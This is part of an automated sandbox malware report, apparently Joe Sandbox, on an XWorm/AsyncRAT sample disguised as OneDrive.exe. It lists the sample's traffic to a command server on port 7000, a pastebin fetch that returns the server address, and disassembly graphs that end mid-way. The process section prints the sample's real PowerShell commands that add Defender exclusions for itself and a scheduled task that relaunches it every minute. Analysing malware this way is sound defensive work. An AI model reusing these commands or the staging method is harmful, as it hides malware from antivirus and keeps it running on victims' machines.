                  Aug 3, 2024 20:12:43.779208899 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.779216051 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.779226065 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.779233932 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.786241055 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.726463079 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.779093981 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:48.780572891 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:48.785588980 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.785624981 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.785660028 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.785686970 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.785720110 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.785753012 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.785784006 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:48.785900116 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:50.748277903 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:50.753278971 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:50.936955929 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:50.938853979 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:50.943738937 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.723671913 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.763401031 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:53.785908937 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:53.790961981 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.790981054 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.791008949 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.791018963 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.791027069 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.791193008 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.791268110 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:53.791279078 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:55.643054962 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:55.685360909 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:58.733055115 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:58.779017925 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:58.811300993 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:58.816209078 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:58.816229105 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:58.816255093 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:58.816268921 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:58.816281080 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:58.816293001 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:58.816385031 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:58.816497087 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:01.782011032 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:13:01.788347960 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:01.971997976 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:01.973762035 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:13:01.978666067 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.728859901 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.771635056 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:13:03.776699066 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.776751041 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.776793957 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.776823044 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.776849985 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.776913881 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.777007103 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:03.777055025 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.846945047 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.884032011 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:13:08.888916016 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.888930082 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.888950109 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.888958931 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.888967991 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.889123917 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.889132977 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:08.889194965 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:13.724164963 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:13.779037952 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:13:15.148211956 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:13:15.153542042 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.187342882 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:13:15.193013906 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.193046093 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.193061113 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.193069935 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.193104029 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.193114042 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.193165064 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.193175077 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.336241007 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:13:15.337507010 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:13:15.342607021 CEST700049711213.219.149.161192.168.2.9

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Aug 3, 2024 20:12:05.646945000 CEST5314953192.168.2.91.1.1.1
                  Aug 3, 2024 20:12:05.654083967 CEST53531491.1.1.1192.168.2.9

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Aug 3, 2024 20:12:05.646945000 CEST192.168.2.91.1.1.10xcd02Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Aug 3, 2024 20:12:05.654083967 CEST1.1.1.1192.168.2.90xcd02No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                  Aug 3, 2024 20:12:05.654083967 CEST1.1.1.1192.168.2.90xcd02No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                  Aug 3, 2024 20:12:05.654083967 CEST1.1.1.1192.168.2.90xcd02No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • pastebin.com

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.949710104.20.4.2354436520C:\Users\user\Desktop\OneDrive.exe
                  TimestampBytes transferredDirectionData
                  2024-08-03 18:12:06 UTC74OUTGET /raw/RPPi3ByL HTTP/1.1
                  Host: pastebin.com
                  Connection: Keep-Alive
                  2024-08-03 18:12:06 UTC397INHTTP/1.1 200 OK
                  Date: Sat, 03 Aug 2024 18:12:06 GMT
                  Content-Type: text/plain; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  x-frame-options: DENY
                  x-content-type-options: nosniff
                  x-xss-protection: 1;mode=block
                  cache-control: public, max-age=1801
                  CF-Cache-Status: HIT
                  Age: 414
                  Last-Modified: Sat, 03 Aug 2024 18:05:12 GMT
                  Server: cloudflare
                  CF-RAY: 8ad846232a804385-EWR
                  2024-08-03 18:12:06 UTC26INData Raw: 31 34 0d 0a 32 31 33 2e 32 31 39 2e 31 34 39 2e 31 36 31 3a 37 30 30 30 0d 0a
                  Data Ascii: 14213.219.149.161:7000
                  2024-08-03 18:12:06 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:14:11:02
                  Start date:03/08/2024
                  Path:C:\Users\user\Desktop\OneDrive.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\OneDrive.exe"
                  Imagebase:0xc00000
                  File size:143'360 bytes
                  MD5 hash:A1CD6F4A3A37ED83515AA4752F98EB1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1321731249.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1321731249.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2623623977.0000000012F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2623623977.0000000012F91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2587401909.0000000002FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:2
                  Start time:14:11:06
                  Start date:03/08/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe'
                  Imagebase:0x7ff760310000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:14:11:06
                  Start date:03/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff70f010000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:14:11:13
                  Start date:03/08/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
                  Imagebase:0x7ff760310000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:14:11:13
                  Start date:03/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff70f010000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:14:11:23
                  Start date:03/08/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
                  Imagebase:0x7ff760310000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:11
                  Start time:14:11:23
                  Start date:03/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff70f010000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:12
                  Start time:14:11:39
                  Start date:03/08/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
                  Imagebase:0x7ff760310000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:13
                  Start time:14:11:39
                  Start date:03/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff70f010000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:17
                  Start time:14:12:04
                  Start date:03/08/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
                  Imagebase:0x7ff6d7a20000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:18
                  Start time:14:12:04
                  Start date:03/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff70f010000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:19
                  Start time:14:12:06
                  Start date:03/08/2024
                  Path:C:\ProgramData\OneDrive.exe
                  Wow64 process (32bit):false
                  Commandline:C:\ProgramData\OneDrive.exe
                  Imagebase:0xe90000
                  File size:143'360 bytes
                  MD5 hash:A1CD6F4A3A37ED83515AA4752F98EB1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\OneDrive.exe, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\OneDrive.exe, Author: ditekSHen
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 76%, ReversingLabs
                  Has exited:true

                  General

                  Target ID:20
                  Start time:14:12:17
                  Start date:03/08/2024
                  Path:C:\ProgramData\OneDrive.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\ProgramData\OneDrive.exe"
                  Imagebase:0x800000
                  File size:143'360 bytes
                  MD5 hash:A1CD6F4A3A37ED83515AA4752F98EB1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:21
                  Start time:14:12:25
                  Start date:03/08/2024
                  Path:C:\ProgramData\OneDrive.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\ProgramData\OneDrive.exe"
                  Imagebase:0x680000
                  File size:143'360 bytes
                  MD5 hash:A1CD6F4A3A37ED83515AA4752F98EB1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:23
                  Start time:14:13:01
                  Start date:03/08/2024
                  Path:C:\ProgramData\OneDrive.exe
                  Wow64 process (32bit):false
                  Commandline:C:\ProgramData\OneDrive.exe
                  Imagebase:0xc70000
                  File size:143'360 bytes
                  MD5 hash:A1CD6F4A3A37ED83515AA4752F98EB1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:24.7%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:6
                    Total number of Limit Nodes:0
                    execution_graph 6046 7ff887b14078 6047 7ff887b14081 SetWindowsHookExW 6046->6047 6049 7ff887b14151 6047->6049 6054 7ff887b136ca 6055 7ff887b13b80 RtlSetProcessIsCritical 6054->6055 6057 7ff887b13c32 6055->6057

                    Executed Functions

                    Function 00007FF887B112B9 Relevance: 12.1, Strings: 9, Instructions: 848COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 7ff887b112b9-7ff887b112f0 2 7ff887b11ba3 0->2 3 7ff887b112f6-7ff887b11402 call 7ff887b104e0 * 7 call 7ff887b105f0 0->3 5 7ff887b11ba8-7ff887b11bef 2->5 41 7ff887b1140b-7ff887b1147c call 7ff887b10498 call 7ff887b10358 call 7ff887b10368 3->41 42 7ff887b11404 3->42 54 7ff887b1147e-7ff887b11488 41->54 55 7ff887b1148f-7ff887b1149f 41->55 42->41 54->55 58 7ff887b114a1-7ff887b114c0 call 7ff887b10358 55->58 59 7ff887b114c7-7ff887b114e7 55->59 58->59 65 7ff887b114f8-7ff887b1155c call 7ff887b10730 59->65 66 7ff887b114e9-7ff887b114f3 call 7ff887b10378 59->66 76 7ff887b115fc-7ff887b1168a 65->76 77 7ff887b11562-7ff887b115f7 65->77 66->65 97 7ff887b11691-7ff887b117cf call 7ff887b10868 call 7ff887b10840 call 7ff887b10388 call 7ff887b10398 76->97 77->97 120 7ff887b1181d-7ff887b11850 97->120 121 7ff887b117d1-7ff887b11804 97->121 131 7ff887b11852-7ff887b11873 120->131 132 7ff887b11875-7ff887b118a5 120->132 121->120 128 7ff887b11806-7ff887b11813 121->128 128->120 133 7ff887b11815-7ff887b1181b 128->133 135 7ff887b118ad-7ff887b118e4 131->135 132->135 133->120 141 7ff887b11909-7ff887b11939 135->141 142 7ff887b118e6-7ff887b11907 135->142 143 7ff887b11941-7ff887b11a02 call 7ff887b103a8 call 7ff887b10490 141->143 142->143 143->5 156 7ff887b11a08-7ff887b11a50 143->156 156->5 161 7ff887b11a56-7ff887b11ad1 call 7ff887b10590 call 7ff887b10730 156->161 174 7ff887b11ad8-7ff887b11b83 161->174 175 7ff887b11ad3 call 7ff887b10810 161->175 188 7ff887b11b8a-7ff887b11ba2 174->188 175->174
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y$6y$6y$6y$N_H$"ry$/y$/y$CAN_^
                    • API String ID: 0-822629667
                    • Opcode ID: e01803fa748e9a4e5bacf351f1a7af56d0fa6a4340b7a61e23918e5cf25f03ed
                    • Instruction ID: fb038686f7ed4a3fa17a0cbc5d120774ffc590d5771ec71ad9b87076237d6cba
                    • Opcode Fuzzy Hash: e01803fa748e9a4e5bacf351f1a7af56d0fa6a4340b7a61e23918e5cf25f03ed
                    • Instruction Fuzzy Hash: 2B42B831B6CA494FEB98EB7894697BDB7E2FF98740F440579E00DC32D2DD28A8418752
                    Function 00007FF887B1D2B8 Relevance: 11.7, Strings: 9, Instructions: 401COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y$6y$6y$6y$"ry$"ry$r6y$r6y$r6y
                    • API String ID: 0-3564432920
                    • Opcode ID: dba23049e25081d9f5cc6b338699c3da137ece2eda3352a3608752dbac92e0a3
                    • Instruction ID: dca003df65b853380236dff45e3c47cf5720b73a1b8343fe50e6f9ebb8329a10
                    • Opcode Fuzzy Hash: dba23049e25081d9f5cc6b338699c3da137ece2eda3352a3608752dbac92e0a3
                    • Instruction Fuzzy Hash: 7DC10771E1CA894FE759DB7C58593B8BBE2FFA9350F4402BAD44CC3293DE2868418752
                    Function 00007FF887B1D2E8 Relevance: 11.6, Strings: 9, Instructions: 392COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y$6y$6y$6y$"ry$"ry$r6y$r6y$r6y
                    • API String ID: 0-3564432920
                    • Opcode ID: 6b6ad3dc2f411a685d87f4fb455a5c828e8bba8b898c4799a07ed2ea5c84c2b8
                    • Instruction ID: db0ec8064acfdf68ecda8c4eb128d2f2aab01fa02d6098ccddc5faa3c36125f9
                    • Opcode Fuzzy Hash: 6b6ad3dc2f411a685d87f4fb455a5c828e8bba8b898c4799a07ed2ea5c84c2b8
                    • Instruction Fuzzy Hash: 19C1F771E1CA894FE759EB7C58593B8BBE2FFA9350F44027AD44CC3293DE2868418752
                    Function 00007FF887B1D2D8 Relevance: 11.6, Strings: 9, Instructions: 389COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y$6y$6y$6y$"ry$"ry$r6y$r6y$r6y
                    • API String ID: 0-3564432920
                    • Opcode ID: 663ccb070e957c948a74d2872c1f3aa5449596fd522a028c86ac34069f1f294f
                    • Instruction ID: 356172b3cb24803c6ec2e47529b51382f921967762bc209aa72dff92810b9b8f
                    • Opcode Fuzzy Hash: 663ccb070e957c948a74d2872c1f3aa5449596fd522a028c86ac34069f1f294f
                    • Instruction Fuzzy Hash: 5AC10871E1CA894FE759EB7C58593B8BBE2FFA9350F44027AD44CC3293DE2868418752
                    Function 00007FF887B14468 Relevance: 2.4, Strings: 1, Instructions: 1199COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 619 7ff887b14468-7ff887b1bbb3 621 7ff887b1bbfd-7ff887b1bc05 619->621 622 7ff887b1bbb5-7ff887b1bbc0 call 7ff887b105e8 619->622 623 7ff887b1bc7b 621->623 624 7ff887b1bc07-7ff887b1bc24 621->624 626 7ff887b1bbc5-7ff887b1bbfc 622->626 628 7ff887b1bc80-7ff887b1bc95 623->628 624->628 629 7ff887b1bc26-7ff887b1bc76 call 7ff887b1aed0 624->629 626->621 632 7ff887b1bcb3-7ff887b1bcc8 628->632 633 7ff887b1bc97-7ff887b1bcae call 7ff887b10818 call 7ff887b105f8 628->633 656 7ff887b1c8bb-7ff887b1c8c9 629->656 642 7ff887b1bcca-7ff887b1bcfa call 7ff887b10818 632->642 643 7ff887b1bcff-7ff887b1bd14 632->643 633->656 642->656 651 7ff887b1bd27-7ff887b1bd3c 643->651 652 7ff887b1bd16-7ff887b1bd22 call 7ff887b17648 643->652 660 7ff887b1bd3e-7ff887b1bd41 651->660 661 7ff887b1bd82-7ff887b1bd97 651->661 652->656 660->623 663 7ff887b1bd47-7ff887b1bd52 660->663 667 7ff887b1bd99-7ff887b1bd9c 661->667 668 7ff887b1bdd8-7ff887b1bded 661->668 663->623 664 7ff887b1bd58-7ff887b1bd7d call 7ff887b105d0 call 7ff887b17648 663->664 664->656 667->623 670 7ff887b1bda2-7ff887b1bdad 667->670 675 7ff887b1be1a-7ff887b1be2f 668->675 676 7ff887b1bdef-7ff887b1bdf2 668->676 670->623 673 7ff887b1bdb3-7ff887b1bdd3 call 7ff887b105d0 call 7ff887b144b8 670->673 673->656 684 7ff887b1be35-7ff887b1be81 call 7ff887b10558 675->684 685 7ff887b1bf07-7ff887b1bf1c 675->685 676->623 679 7ff887b1bdf8-7ff887b1be15 call 7ff887b105d0 call 7ff887b144c0 676->679 679->656 684->623 719 7ff887b1be87-7ff887b1bead 684->719 693 7ff887b1bf3b-7ff887b1bf50 685->693 694 7ff887b1bf1e-7ff887b1bf21 685->694 703 7ff887b1bf72-7ff887b1bf87 693->703 704 7ff887b1bf52-7ff887b1bf55 693->704 694->623 696 7ff887b1bf27-7ff887b1bf36 call 7ff887b14498 694->696 696->656 709 7ff887b1bf89-7ff887b1bfa2 703->709 710 7ff887b1bfa7-7ff887b1bfbc 703->710 704->623 705 7ff887b1bf5b-7ff887b1bf6d call 7ff887b14498 704->705 705->656 709->656 716 7ff887b1bfdc-7ff887b1bff1 710->716 717 7ff887b1bfbe-7ff887b1bfd7 710->717 723 7ff887b1c011-7ff887b1c026 716->723 724 7ff887b1bff3-7ff887b1c00c 716->724 717->656 732 7ff887b1beaf-7ff887b1bebf call 7ff887b10eb0 719->732 733 7ff887b1bec0-7ff887b1bf02 call 7ff887b17658 719->733 728 7ff887b1c028-7ff887b1c02b 723->728 729 7ff887b1c04f-7ff887b1c064 723->729 724->656 728->623 731 7ff887b1c031-7ff887b1c04a 728->731 740 7ff887b1c06a-7ff887b1c0e2 729->740 741 7ff887b1c104-7ff887b1c119 729->741 731->656 732->623 732->733 733->656 740->623 767 7ff887b1c0e8-7ff887b1c0ff 740->767 745 7ff887b1c11b-7ff887b1c12c 741->745 746 7ff887b1c131-7ff887b1c146 741->746 745->656 754 7ff887b1c14c-7ff887b1c1c4 746->754 755 7ff887b1c1e6-7ff887b1c1fb 746->755 754->623 787 7ff887b1c1ca-7ff887b1c1e1 754->787 760 7ff887b1c1fd-7ff887b1c20e 755->760 761 7ff887b1c213-7ff887b1c228 755->761 760->656 769 7ff887b1c25a-7ff887b1c26f 761->769 770 7ff887b1c22a-7ff887b1c255 call 7ff887b10ae0 call 7ff887b1aed0 761->770 767->656 776 7ff887b1c34c-7ff887b1c361 769->776 777 7ff887b1c275-7ff887b1c347 call 7ff887b10ae0 call 7ff887b1aed0 769->777 770->656 785 7ff887b1c428-7ff887b1c43d 776->785 786 7ff887b1c367-7ff887b1c36a 776->786 777->656 796 7ff887b1c43f-7ff887b1c44c call 7ff887b1aed0 785->796 797 7ff887b1c451-7ff887b1c466 785->797 788 7ff887b1c41d-7ff887b1c422 786->788 789 7ff887b1c370-7ff887b1c37b 786->789 787->656 798 7ff887b1c423 788->798 789->788 793 7ff887b1c381-7ff887b1c41b call 7ff887b10ae0 call 7ff887b1aed0 789->793 793->798 796->656 805 7ff887b1c468-7ff887b1c479 797->805 806 7ff887b1c4dd-7ff887b1c4f2 797->806 798->656 805->623 815 7ff887b1c47f-7ff887b1c48f call 7ff887b105c8 805->815 812 7ff887b1c532-7ff887b1c547 806->812 813 